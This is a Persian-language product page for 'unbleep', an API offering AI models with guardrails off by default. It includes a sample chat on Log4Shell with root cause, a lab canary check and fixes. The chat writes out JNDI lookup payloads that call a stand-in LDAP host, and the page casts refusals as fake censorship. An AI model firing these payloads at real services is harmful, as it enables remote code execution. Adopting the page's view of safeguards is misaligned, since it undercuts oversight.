unbleep کردنِ مدل.

مدل‌های رایج با یک بوقِ سانسور جواب می‌دهند. ما بوق را برمی‌داریم.

یک API توسعه‌دهنده‌محور و سازگار با OpenAI برای مدل‌های بدون محدودیت — برای ردتیمینگ، ارزیابی جیلبریک، پژوهش ایمنی و هر چیزی که نمی‌تواند با یک امتناع ساختگی منتشر شود.

01

سه مدل. به‌طور پیش‌فرض بدون گاردریل.

نام‌ها بر پایهٔ کاری است که انجام می‌دهند، نه مدل وزن‌بازِ زیرین — تا بتوانیم وزن‌ها را بهبود دهیم بدون آنکه هرگز کد شما از کار بیفتد.

unbleep فعال
اسم رمز · Core

گزینهٔ پیش‌فرض. پنجرهٔ 256K توکنی، بدون سانسور — اسب بارکش روزمره برای ردتیمینگ، ارزیابی‌ها و پژوهش.

کانتکست256K
ورودی / 1M$3.00
خروجی / 1M$3.00
unbleep-high فعال
اسم رمز · Max

ردهٔ پیشرو. کانتکست 1M توکنی برای بزرگ‌ترین کارها — کل کدبیس‌ها، رونوشت‌های طولانی، تحلیل عمیق چندسندی.

کانتکست1M
ورودی / 1M$5.00
خروجی / 1M$5.00
unbleep-mini فعال
اسم رمز · Mini

گزینهٔ ارزان و سریع. هزینهٔ کمتر به‌ازای هر توکن برای ترافیک پرحجم و فراخوانی‌های ساده‌تر.

کانتکست32K
ورودی / 1M$1.00
خروجی / 1M$1.00
02

بدون سانسور، در عمل

یک جلسهٔ ردتیم روی Log4Shell — علت ریشه‌ای، یک بررسی امن در آزمایشگاه، و راه‌حل. نه موعظه، نه امتناع؛ فقط تحلیل.

جلسه · CVE-2021-44228 مدل unbleep · سیاست off
شما
CVE-2021-44228 (Log4Shell) را تشریح کن. علت ریشه‌ای، و اینکه چطور lookup در JNDI به RCE تبدیل می‌شود.
unbleep
Log4j ≤ 2.14.1 عبارت‌های ${…} را درون رشته‌هایی که لاگ می‌کند ارزیابی می‌کند. مقدار لاگ‌شده‌ای مانند ${jndi:ldap://host/x} باعث می‌شود JVM آن نام را از طریق LDAP/RMI resolve کند، یک کلاس جاوای راه دور را واکشی و نمونه‌سازی کند — کد دلخواه در فرایند لاگینگ اجرا می‌شود. سطح حمله هر چیزی است که به یک فراخوانی لاگ می‌رسد: User-Agent، هدرها، فیلدهای فرم. بازهٔ آسیب‌پذیر: 2.0-beta9 → 2.14.1.
شما
چطور در آزمایشگاه خودم تأیید کنم که یک سرویس آسیب‌پذیر است — بدون اجرای یک اکسپلویت واقعی؟
unbleep
از یک canary خارج از باند استفاده کن؛ به کلاس payload نیازی نیست:
  1. یک شنوندهٔ DNS/LDAP تحت کنترل خودت اجرا کن (مثلاً یک نمونهٔ interactsh).
  2. ${jndi:ldap://<token>.your-collab/x} را در هدری بفرست که می‌دانی لاگ می‌شود.
  3. یک درخواست DNS برای <token> یعنی رشته interpolate شده → آسیب‌پذیر. چیزی سرو نمی‌شود، پس چیزی اجرا نمی‌شود.
سپس در jarهای دیپلوی‌شده دنبال JndiLookup.class بگرد و نسخه‌ها را با بازهٔ آسیب‌پذیر مقایسه کن.
unbleep
راه‌حل: ارتقا به 2.17.1+. هنوز نمی‌توانی؟ log4j2.formatMsgNoLookups=true را تنظیم کن (2.10+) یا JndiLookup.class را از classpath حذف کن، یک قانون WAF برای ${jndi: اضافه کن، و LDAP/RMI خروجی هاست را با فیلتر egress ببند.
03

مهاجرت یک‌خطی

این API جایگزینِ مستقیم و سازگار با OpenAI است. آدرس پایه و کلید را عوض کنید — کد، SDKها و ابزارهای فعلی شما همچنان کار می‌کنند.

python · openai sdk
from openai import OpenAI

client = OpenAI(
    base_url="https://unbleep.ai/v1",   # ← the only change
    api_key="ub_live_9f2c…",
)

stream = client.chat.completions.create(
    model="unbleep",
    messages=[{"role": "user", "content": "…"}],
    stream=True,
)
for chunk in stream:
    print(chunk.choices[0].delta.content or "", end="")
سازگار

SDK شما، بدون تغییر

OpenAI Python، Node و هر ابزاری که با Chat Completions API صحبت می‌کند. چیز تازه‌ای برای یادگیری نیست.

استریم

SSE، توکن به توکن

text/event-stream از چانک‌های delta، که با [DONE] پایان می‌یابد — دقیقاً همان چیزی که کلاینت شما همین حالا هم parse می‌کند.

پیچ سیاست

به‌طور پیش‌فرض خاموش

هر وقت پروژه‌ای لازم داشت، "policy": "research" را بفرستید تا درخواست در تاریخچهٔ مصرف شما برچسب بخورد، یا "strict" را تا فهرست مسدودسازی اعمال شود.

04

پلن‌ها و قیمت‌ها

هر وقت لازم داشتید اعتبار بخرید، یا آن را روی یک پلن ماهانه بگذارید تا خودبه‌خود برسد. هر درخواست بر اساس توکن‌هایی که واقعاً مصرف کرده صورتحساب می‌شود، با نرخ منتشرشدهٔ هر میلیون توکن برای مدلی که فراخوانی کرده‌اید.

Developer
$20/ماه
هر ماه $20 اعتبار
  • خودکار می‌رسد — نیازی به یادآوری شارژ نیست
  • محدودیت نرخ افزایش‌یافته
شروع ساختن
Scale
$200/ماه
هر ماه $200 اعتبار
  • خودکار می‌رسد — نیازی به یادآوری شارژ نیست
  • بالاترین محدودیت نرخ
  • پشتیبانی اولویت‌دار
ساخت حساب
Enterprise
سفارشی
محدودیت‌ها و شرایط توافقی
  • تعهد حجمی
  • ظرفیت اختصاصی
  • قراردادهای سفارشی
  • پشتیبانی اولویت‌دار
تماس با فروش
قیمت توکن unbleep ورودی $3.00 / خروجی $3.00 unbleep-high $5.00 / $5.00 unbleep-mini $1.00 / $1.00 به‌ازای هر 1M توکن
پیش‌پرداخت

شارژ کنید، بعد بسازید

هر وقت لازم داشتید با کارت اعتبار اضافه کنید، یا بگذارید یک پلن هر ماه آن را تحویل دهد. تا وقتی حسابتان باز است منقضی نمی‌شود، و اعتبار مصرف‌نشده تا 14 روز قابل بازپرداخت است.

بر پایهٔ مصرف

درخواست‌های ناموفق رایگان‌اند

هنگام شروع درخواست یک برآورد رزرو می‌کنیم و در پایان آن را با هزینهٔ واقعی توکن‌ها تسویه می‌کنیم. درخواستی که خطا بدهد آزاد می‌شود و هرگز هزینه‌ای ندارد.

قابل پیش‌بینی

نمی‌توانید بیش از موجودی خرج کنید

وقتی موجودی شما کفاف درخواستی را ندهد، آن درخواست رد می‌شود — ما هرگز اعتبار قرض نمی‌دهیم و بعداً صورتحساب نمی‌فرستیم. موجودی و مصرف توکن در کنسول در دسترس است.

ساخته‌شده برای کنترل، نه هرج‌ومرج

unbleep برای تیم‌های امنیتی، پژوهشگران و سازندگانی است که به یک خط پایهٔ بدون فیلتر نیاز دارند. به‌طور پیش‌فرض بدون نگهداری داده، یک پیچ سیاست درجه‌یک، تاریخچهٔ مصرف و هزینه به‌ازای هر درخواست در کنسول، و یک سیاست استفادهٔ مجاز واقعی. بدون سانسور یک قابلیت است — شما تصمیم می‌گیرید چطور مدیریت شود.